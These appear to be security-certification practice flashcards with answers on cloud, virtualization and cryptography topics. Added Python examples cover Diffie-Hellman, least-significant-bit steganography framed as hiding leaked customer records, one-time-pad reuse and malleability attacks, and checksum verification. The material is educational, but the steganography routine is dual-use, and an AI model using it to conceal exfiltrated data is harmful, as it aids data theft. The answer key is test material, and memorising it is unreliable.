OBJ-7.1: Containerization is the logical isolation of enterprise data from personal data while co-existing in the same device. The major benefit of containerization is that administrators can only control work profiles that are kept separate from the user’s personal accounts, apps, and data. This technology basically creates a secure vault for your corporate information. Highly targeted remote wiping is supported with most container-based solutions.

112
Q

Which of the following types of digital forensic investigations is most challenging due to the on-demand nature of the analyzed assets?

A. Employee workstations

B. Cloud services

C. Mobile devices

D. On-premise servers

A

B. Cloud services
Explanation
OBJ-8.1: The on-demand nature of cloud services means that instances are often created and destroyed again, with no real opportunity for forensic recovery of any data. Cloud providers can mitigate this to some extent by using extensive logging and monitoring options. A CSP might also provide an option to generate a file system and memory snapshots from containers and VMs in response to an alert condition generated by a SIEM. Employee workstations are often the easiest to conduct forensics on since they are a single-user environment for the most part. Mobile devices have some unique challenges due to their operating systems, but good forensic tool suites are available to ease the forensic acquisition and analysis of mobile devices. On-premise servers are more challenging than a workstation to analyze, but they do not suffer from the same issues as cloud-based services and servers.

113
Q

Your company has decided to move all of its data into the cloud. Your company is concerned about the privacy of its data due to some recent data breaches that have been in the news. Therefore, they have decided to purchase cloud storage resources that will be dedicated solely for their use. Which of the following types of clouds is your company using?

A. Hybrid

B. Private

C. Public

D. Community

A

B. Private
Explanation
OBJ-8.1: Private cloud refers to a cloud computing model where IT services are provisioned over private IT infrastructure for the dedicated use of a single organization. A private cloud is usually managed via internal resources. The terms private cloud and virtual private cloud (VPC) are often used interchangeably.

114
Q

Which of the following are valid concerns when migrating to a serverless architecture? (SELECT THREE)

A. Protection of endpoint security

B. Management of VPC offerings

C. Dependency on the cloud service provider

D. Limited disaster recovery options

E. Patching of the backend infrastructure

F. Management of physical servers

A

A. Protection of endpoint security
C. Dependency on the cloud service provider
D. Limited disaster recovery options
Explanation
OBJ-8.1: Serverless is a modern design pattern for service delivery. With serverless, all the architecture is hosted within a cloud, but unlike “traditional” virtual private cloud (VPC) offerings, services such as authentication, web applications, and communications aren’t developed and managed as applications running on servers located within the cloud. Instead, the applications are developed as functions and microservices, each interacting with other functions to facilitate client requests. There is a heavy dependency on the cloud service provider in a serverless architecture system since all of the back-end infrastructure’s patching and management functions are done by them. An organization using such an architecture would still need to prevent compromise of the user endpoints, though the cloud service provider does not manage these. Another concern with serverless architectures is that there are limited options for disaster recovery if service provisioning fails. Patching of backend infrastructure is eliminated because the infrastructure is eliminated with serverless architectures. Once migration is complete, there are no physical servers to manage, which reduces the workload on your system administration teams.

115
Q

Your organization has recently migrated to a SaaS provider for its enterprise resource planning (ERP) software. Before this migration, a weekly port scan was conducted to help validate the on-premise systems’ security. Which of the following actions should you take to validate the security of the cloud-based solution?

A. Utilize a different scanning tool

B. Utilize vendor testing and audits

C. Utilize a third-party contractor to conduct the scans

D. Utilize a VPN to scan inside the vendor’s security perimeter

A

B. Utilize vendor testing and audits
Explanation
OBJ-8.1: The best option is to utilize vendor testing and audits in a cloud-based environment. Most SaaS providers will not allow customers to conduct their own port scans or vulnerability scans against the SaaS service. This means you cannot scan using a VPN connection, utilize different scanning tools, or hire a third-party contractor to scan on your behalf.

116
Q

What type of cloud service would provide you with a complete development and deployment environment in the cloud for you to create customized cloud-based apps?

A. PaaS

B. IaaS

C. SaaS

D. DaaS

A

A. PaaS
Explanation
OBJ-8.1: Platform as a service (PaaS) is a complete development and deployment environment in the cloud, with resources that enable you to deliver everything from simple cloud-based apps to sophisticated, cloud-enabled enterprise applications. You purchase the resources you need from a cloud service provider on a pay-as-you-go basis and access them over a secure Internet connection. PaaS includes infrastructure (servers, storage, and networking) and middleware, development tools, business intelligence (BI) services, database management systems, and more. PaaS allows you to avoid the expense and complexity of buying and managing software licenses, the underlying application infrastructure and middleware, container orchestrators, or the development tools and other resources. You manage the applications and services you develop, and the cloud service provider typically manages everything else.

117
Q

Which of the following is the MOST dangerous type of threat when using virtualization?

A. Virtual NIC duplication

B. VM escape

C. Rogue VM

D. VM sprawl

A

B. VM escape
Explanation
OBJ-8.1: VM escape refers to malware running on a guest OS jumping to another guest or the host. As with any other software type, it is vital to keep the hypervisor code up-to-date with patches for critical vulnerabilities. VM escape is the biggest threat to virtualized systems.

118
Q

Which cloud computing concept is BEST described as focusing on replacing the hardware and software required when creating and testing new applications and programs from a customer’s environment with cloud-based resources?

A. PaaS

B. SaaS

C. IaaS

D. SECaaS

A

A. PaaS
Explanation
OBJ-8.1: Platform as a Service (PaaS) provides the end-user with a development environment without all the hassle of configuring and installing it themselves. If you want to develop a customized or specialized program, PaaS helps reduce the development time and overall costs by providing a ready to use platform.

119
Q

Which of the following hashing algorithms results in a 128-bit fixed output?

A. MD-5

B. SHA-1

C. RIPEMD

D. SHA-2

A

A. MD-5
Explanation
OBJ-9.1: MD-5 produces a 128-bit fixed-length digest. SHA-1 produces a 160-bit digest. SHA-2 is a family (SHA-224, SHA-256, SHA-384, SHA-512) whose smallest output is 224 bits; the commonly used SHA-256 produces 256 bits. RIPEMD-160, the variant in common use, produces a 160-bit digest.

120
Q

A company needs to implement stronger authentication by adding an authentication factor to its wireless system. The wireless system only supports WPA with pre-shared keys, but the backend authentication system supports EAP and TTLS. What should the network administrator implement?

A. PKI with user authentication

B. 802.1X using EAP with MSCHAPv2

C. WPA2 with a complex shared key

D. MAC address filtering with IP filtering

A

B. 802.1X using EAP with MSCHAPv2
Explanation
OBJ-9.1: Because the backend authentication system already supports EAP (typically via a RADIUS server), the network administrator can deploy 802.1X on the wireless network using EAP with MSCHAPv2, which adds a per-user credential as an authentication factor. WPA2 with a complex shared key is still a single secret shared by everyone, and MAC or IP address filtering is not an authentication factor at all.

121
Q

Which of the following cryptographic algorithms is classified as asymmetric?

A. AES

B. RC4

C. Diffie-Hellman

D. Blowfish

A

C. Diffie-Hellman
Explanation
OBJ-9.1: Diffie-Hellman (DH) is a key-agreement protocol used to establish a shared secret over a public channel, and was one of the first public-key protocols. Each party publishes a value derived from its own private exponent, and the security rests on the difficulty of the discrete logarithm problem; as a public-key protocol, it is asymmetric. AES, RC4, and Blowfish are all symmetric algorithms.
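Added worked example, not part of the practice exam: a complete Diffie-Hellman exchange in plain Python showing what is public (p, g, and both parties’ public values) and what stays private, with the two checks a careful implementation makes on the peer’s value. The group parameters are generated at run time as a toy 64-bit safe prime so the block runs stand-alone; that size is an assumption for demonstration only, and real deployments use a published 2048-bit or larger group (RFC 3526 / RFC 7919).

```python
import hashlib
import secrets


def is_probable_prime(n: int, rounds: int = 32) -> bool:
    """Miller-Rabin with random bases; the false-positive odds at 32 rounds are negligible."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        a = secrets.randbelow(n - 3) + 2
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def generate_group(bits: int) -> tuple:
    """Toy parameters: a safe prime p = 2q + 1 and a generator g of the order-q
    subgroup. Real deployments use a published group of 2048 bits or more;
    this size is assumed here purely so the example runs quickly."""
    while True:
        q = secrets.randbits(bits - 1) | (1 << (bits - 2)) | 1
        if is_probable_prime(q) and is_probable_prime(2 * q + 1):
            p = 2 * q + 1
            break
    while True:
        g = pow(secrets.randbelow(p - 3) + 2, 2, p)   # a square lies in the order-q subgroup
        if g != 1:
            return p, g


def valid_peer_value(p: int, y: int) -> bool:
    """Reject 0, 1, p-1 and anything outside the order-q subgroup (small-subgroup attacks)."""
    q = (p - 1) // 2
    return 2 <= y <= p - 2 and pow(y, q, p) == 1


class Party:
    def __init__(self, p: int, g: int):
        self.p, self.g = p, g
        self.private = secrets.randbelow((p - 1) // 2 - 1) + 1   # kept secret, never sent
        self.public = pow(g, self.private, p)                    # sent in the clear

    def shared_key(self, peer_public: int) -> bytes:
        if not valid_peer_value(self.p, peer_public):
            raise ValueError("bad public value from peer")
        secret = pow(peer_public, self.private, self.p)   # g^(ab) on both sides
        # Derive a fixed-size symmetric key from the shared group element.
        return hashlib.sha256(secret.to_bytes((self.p.bit_length() + 7) // 8, "big")).digest()


def exchange(bits: int = 64) -> dict:
    p, g = generate_group(bits)
    alice, bob = Party(p, g), Party(p, g)
    # Everything an eavesdropper sees: p, g, alice.public, bob.public.
    return {
        "p": p, "g": g,
        "alice_public": alice.public, "bob_public": bob.public,
        "alice_key": alice.shared_key(bob.public),
        "bob_key": bob.shared_key(alice.public),
    }
```

Note what the exchange does not provide: nothing here tells Alice that the public value she received came from Bob, which is why unauthenticated DH is exactly the setting for the man-in-the-middle attack from question 90; in practice the public values are signed or run inside TLS.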

122
Q

A company has recently experienced a data breach and has lost nearly 1 GB of personally identifiable information about its customers. You have been assigned as part of the incident response team to identify how the data was leaked from the network. Your team has conducted an extensive investigation, and so far, the only evidence of a large amount of data leaving the network is from the email server. One user has sent numerous large attachments out of the network to their personal email address. Upon closer inspection, those emails only contain pictures of that user’s recent trip to Australia. What is the most likely explanation for how the data left the network?

A. Steganography was used to hide the leaked data inside the user’s photos

B. The files were downloaded from home while connected to the corporate VPN

C. The data was hashed and then emailed to their personal email account

D. The data was encrypted and emailed to their spouse's email account

A

A. Steganography was used to hide the leaked data inside the user’s photos
Explanation
OBJ-9.1: The most likely explanation is that the user utilized steganography to hide the leaked data inside their trip photos. Steganography is the process of hiding one message inside another. By hiding the customers' information within the digital photos, which still open and display normally, the incident response team would not see the hidden data without knowing to look for it inside the seemingly benign pictures from the trip. The scenario did not mention whether or not the user connected to the corporate VPN from their home, and the company should log all VPN connections, so this is not the correct answer. Additionally, the user could not hash the data and email it to themselves without losing the information, since hash functions are one-way. Therefore, even if the user had the hash value, they still would not have the customers' personal information. Finally, according to the scenario, the user's email showed no evidence of encrypted files being sent.
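The hiding technique the scenario describes, as an added example that is not part of the original flashcard: least-significant-bit (LSB) steganography, where each payload bit replaces the lowest bit of one pixel byte so the image changes by at most one intensity level per byte. The cover "image" is a constructed byte buffer with an all-even gradient, and the payload is a constructed sample record; a real tool would read and write the pixel bytes of a BMP or PNG. The `embed`, `extract` and `lsb_ones_ratio` names are hypothetical. The last function is a crude steganalysis statistic: on this cover the LSB plane is all zero before embedding and clearly not afterwards, which is the kind of anomaly an investigator would look for.

```python
# Added example, not code from the flashcard: LSB steganography over a raw
# pixel buffer. The cover and payload below are constructed sample data.

LENGTH_FIELD = 4   # payload length stored in the first 32 LSBs


def embed(cover, payload):
    """Write a 4-byte length plus payload into the LSB of successive cover bytes."""
    data = len(payload).to_bytes(LENGTH_FIELD, "big") + payload
    if len(data) * 8 > len(cover):
        raise ValueError("cover too small: need %d bytes, have %d" % (len(data) * 8, len(cover)))
    out = bytearray(cover)
    for i, byte in enumerate(data):
        for bit in range(8):
            idx = i * 8 + bit
            out[idx] = (out[idx] & 0xFE) | ((byte >> (7 - bit)) & 1)
    return bytes(out)


def _read_bytes(stego, offset, count):
    """Reassemble `count` bytes from the LSBs starting at byte index `offset`."""
    buf = bytearray()
    for i in range(count):
        value = 0
        for bit in range(8):
            value = (value << 1) | (stego[(offset + i) * 8 + bit] & 1)
        buf.append(value)
    return bytes(buf)


def extract(stego):
    """Recover the payload: read the length field, then that many bytes."""
    length = int.from_bytes(_read_bytes(stego, 0, LENGTH_FIELD), "big")
    return _read_bytes(stego, LENGTH_FIELD, length)


def max_pixel_change(cover, stego):
    """Each modified byte changes by at most 1, which is invisible in a photo."""
    return max(abs(a - b) for a, b in zip(cover, stego))


def lsb_ones_ratio(buf, start=0, end=None):
    """Fraction of set LSBs in a region; a crude steganalysis statistic."""
    region = buf[start:end]
    return sum(b & 1 for b in region) / len(region)


# Constructed cover: a smooth gradient whose values are all even, so its LSB
# plane is entirely zero before embedding (real photos are noisier than this).
COVER = bytes(((i // 16) * 2) & 0xFF for i in range(4096))
# Constructed sample of the kind of record that might be exfiltrated.
PAYLOAD = b"customer,email\nA. Example,a@example.com\n"


def demo():
    stego = embed(COVER, PAYLOAD)
    region_end = (LENGTH_FIELD + len(PAYLOAD)) * 8
    return {
        "recovered": extract(stego),
        "max_change": max_pixel_change(COVER, stego),
        "lsb_ratio_before": lsb_ones_ratio(COVER, 0, region_end),
        "lsb_ratio_after": lsb_ones_ratio(stego, 0, region_end),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

Capacity is one payload bit per cover byte, so a 1 GB leak would need roughly 8 GB of raw pixel data, which is consistent with the "numerous large attachments" in the scenario. Real tools usually encrypt the payload first, which also defeats the simple ones-ratio check above by making the embedded bits look random; detection then needs comparison against the original photo or statistical tests across many images.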

123
Q

You are working for a government contractor who requires all users to use a PIV device when sending digitally signed and encrypted emails. Which of the following physical security measures is being implemented?

A. Smart card

B. Key fob

C. Biometric reader

D. Cable lock

A

A. Smart card
Explanation
OBJ-9.1: A PIV (Personal Identity Verification) card is the US federal government's smart card standard (FIPS 201). It holds the user's certificates and private keys, and the private-key operations for signing and decrypting email are performed on the card after the user enters a PIN. More generally, a smart card is used in applications that need to protect personal information and/or deliver fast, secure transactions, such as transit fare payment cards, government and corporate identification cards, documents such as electronic passports and visas, and financial payment cards. Often, smart cards are used as part of a multifactor authentication system where both the smart card and a PIN must be presented for authentication to occur.

124
Q

Frank and John have started a secret club together. They want to ensure that when they send messages to each other, they are truly unbreakable. What encryption key would provide the STRONGEST and MOST secure encryption?

A. DES with a 56-bit key

B. AES with a 256-bit key

C. ECC with a 256-bit key

D. Randomized one-time use pad

A

D. Randomized one-time use pad
Explanation
OBJ-9.1: The only provably unbreakable encryption is a one-time pad: a truly random key at least as long as the message, shared securely in advance by the two parties, combined (usually XORed) with the message, and never reused. Because every key bit is random and used once, the ciphertext carries no pattern an attacker could exploit, and breaking one message tells the attacker nothing about any other. The cost is operational: two identical copies of the pad must be generated from a true random source and distributed securely before use, the pad must be as long as all the traffic it protects, and any reuse of pad material (a "two-time pad") lets an attacker XOR two ciphertexts together and recover the XOR of the two plaintexts. A one-time pad also provides no integrity: an attacker can flip ciphertext bits to flip the corresponding plaintext bits. DES with a 56-bit key has been broken by brute force. AES with a 256-bit key and ECC with a 256-bit key are both considered secure today, but their security is computational rather than information-theoretic: given enough time and computing power (or, for ECC, a sufficiently large quantum computer), they could in principle be broken.
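The pad described above, as an added example that is not part of the original flashcard. It implements the one-time pad with a consumption offset so pad bytes cannot be reused, and then demonstrates the two failure modes the explanation mentions: reusing pad bytes (which leaks m1 XOR m2, and therefore m2 whenever m1 is known) and assuming secrecy implies integrity (an attacker who knows the message format can flip bits). All messages are constructed; the `OneTimePad` class and the demo function names are hypothetical.

```python
import secrets

# Added example, not code from the flashcard: a one-time pad plus the two ways
# it fails in practice (pad reuse, and no integrity). Messages are constructed.


def xor_bytes(a, b):
    """XOR two equal-length byte strings (the pad operation and its own inverse)."""
    if len(a) != len(b):
        raise ValueError("lengths differ")
    return bytes(x ^ y for x, y in zip(a, b))


class OneTimePad:
    """Pad material shared out of band; each byte is consumed exactly once."""

    def __init__(self, pad):
        self._pad = pad
        self._offset = 0

    @classmethod
    def generate(cls, length):
        # CSPRNG output at least as long as all traffic the pad will ever protect.
        return cls(secrets.token_bytes(length))

    def copy(self):
        """The second identical copy, handed to the other party securely."""
        return OneTimePad(self._pad)

    def _consume(self, n):
        if self._offset + n > len(self._pad):
            raise RuntimeError("pad exhausted; reusing pad bytes would break security")
        chunk = self._pad[self._offset:self._offset + n]
        self._offset += n
        return chunk

    def encrypt(self, message):
        return xor_bytes(message, self._consume(len(message)))

    decrypt = encrypt   # the peer consumes its copy in lockstep, so decrypt == encrypt


def roundtrip():
    """Frank encrypts two messages; John's copy of the pad decrypts both."""
    frank = OneTimePad.generate(64)
    john = frank.copy()
    m1, m2 = b"meet at the pier at dawn", b"bring the ledger"
    c1, c2 = frank.encrypt(m1), frank.encrypt(m2)
    return john.decrypt(c1) == m1 and john.decrypt(c2) == m2


def exhaustion_is_refused():
    """Once the pad is used up, encryption must stop rather than wrap around."""
    pad = OneTimePad.generate(8)
    pad.encrypt(b"12345678")
    try:
        pad.encrypt(b"x")
    except RuntimeError:
        return True
    return False


def two_time_pad_leak():
    """Pad reuse: c1 XOR c2 = m1 XOR m2, so a known m1 reveals m2 outright."""
    pad = secrets.token_bytes(16)
    m1, m2 = b"ORDER: attack at", b"ORDER: hold fast"
    c1, c2 = xor_bytes(m1, pad), xor_bytes(m2, pad)
    return xor_bytes(xor_bytes(c1, c2), m1) == m2


def malleability():
    """Perfect secrecy is not integrity: flipping ciphertext bits flips plaintext bits."""
    pad = secrets.token_bytes(10)
    c = xor_bytes(b"PAY $00100", pad)
    delta = xor_bytes(b"PAY $00100", b"PAY $99100")   # attacker knows the message format
    return xor_bytes(xor_bytes(c, delta), pad)         # the recipient decrypts b"PAY $99100"


if __name__ == "__main__":
    print("roundtrip:", roundtrip())
    print("two-time pad leaks m2:", two_time_pad_leak())
    print("tampered plaintext:", malleability())
```

`secrets.token_bytes` is the operating system CSPRNG, which is the closest a program can get to the true randomness a pad requires; a seeded PRNG such as `random` would reintroduce exactly the key pattern the pad is meant to eliminate. The malleability result is why a real deployment would pair the pad with a message authentication code.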

125
Q

Keith wants to validate the application file that he downloaded from the vendor of the application. Which of the following should he compare against the file to verify the integrity of the downloaded application?

A. File size and file creation date

B. MD5 or SHA1 hash digest of the file

C. Private key of the file

D. Public key of the file

A

B. MD5 or SHA1 hash digest of the file
Explanation
OBJ-9.1: Keith should compute a hash of the downloaded file and compare it against the digest the vendor publishes for that file. If the two digests match, the file was not corrupted or modified during the download. The other options are insufficient, since integrity checking relies on comparing hash digests. Public and private keys are not assigned to an individual file and do not by themselves provide integrity; a digital signature, which combines a hash with the vendor's private key, would, but that is not what these options describe. File size and creation date are metadata that can match even when the content has been altered, so they are a much weaker check than a hash digest. Therefore, the MD5 or SHA-1 hash digest is the best answer among those offered. In practice, prefer SHA-256 or stronger, since MD5 and SHA-1 are vulnerable to collision attacks, and remember that a digest fetched from the same server as the file only detects transit corruption: if the server is compromised, the attacker can replace both. A vendor signature over the checksum file, verified against a key obtained out of band, addresses that case.
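The check described above, as an added example that is not part of the original flashcard: verify a download against a published checksum line in either GNU (`digest  name`, `digest *name`) or BSD (`SHA256 (name) = digest`) form, hashing in chunks so large files need not be held in memory, and refusing MD5/SHA-1 digests unless the caller explicitly accepts them. The checksum lines and the "downloaded" bytes are constructed inline; in practice the line comes from the vendor page and the bytes from the file on disk. The `verify_download` and `parse_checksum_line` names are hypothetical.

```python
import hashlib
import hmac
import re

# Added example, not code from the flashcard: verify a downloaded file against a
# published digest line. Digest lines and file bytes below are constructed.

ALGORITHM_BY_HEX_LENGTH = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}
WEAK = {"md5", "sha1"}   # collision attacks exist; accept only when nothing stronger is published

_BSD_STYLE = re.compile(r"^(\w+)\s*\((.+)\)\s*=\s*([0-9a-fA-F]+)$")


def parse_checksum_line(line):
    """Return (algorithm, filename, lowercase hex digest) from a GNU or BSD style line."""
    line = line.strip()
    m = _BSD_STYLE.match(line)
    if m:
        return m.group(1).lower(), m.group(2), m.group(3).lower()
    digest, name = line.split(None, 1)
    name = name.lstrip("*")   # '*' marks binary mode in GNU md5sum/sha*sum output
    algorithm = ALGORITHM_BY_HEX_LENGTH.get(len(digest))
    if algorithm is None:
        raise ValueError("unrecognised digest length %d" % len(digest))
    return algorithm, name, digest.lower()


def digest_chunks(chunks, algorithm):
    """Hash an iterable of byte chunks, as one would when streaming a file from disk."""
    h = hashlib.new(algorithm)
    for chunk in chunks:
        h.update(chunk)
    return h.hexdigest()


def verify_download(data, checksum_line, allow_weak=False, chunk_size=1 << 16):
    """True if `data` hashes to the digest in `checksum_line`; weak algorithms need opt-in."""
    algorithm, _name, expected = parse_checksum_line(checksum_line)
    if algorithm in WEAK and not allow_weak:
        raise ValueError("%s is collision-broken; insist on SHA-256 or better" % algorithm)
    chunks = (data[i:i + chunk_size] for i in range(0, len(data), chunk_size))
    actual = digest_chunks(chunks, algorithm)
    # compare_digest is constant-time; unnecessary for a local file but a good habit
    return hmac.compare_digest(actual, expected)


if __name__ == "__main__":
    # Constructed: the "downloaded" file is the bytes b"abc"; digest is SHA-256("abc").
    line = "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad  app.bin"
    print("intact:", verify_download(b"abc", line))
    print("tampered:", verify_download(b"abd", line))
```

A matching digest proves only that the bytes received equal the bytes the digest was computed over; it does not prove who computed it. Pair this with verification of the vendor's signature over the checksum file when one is available.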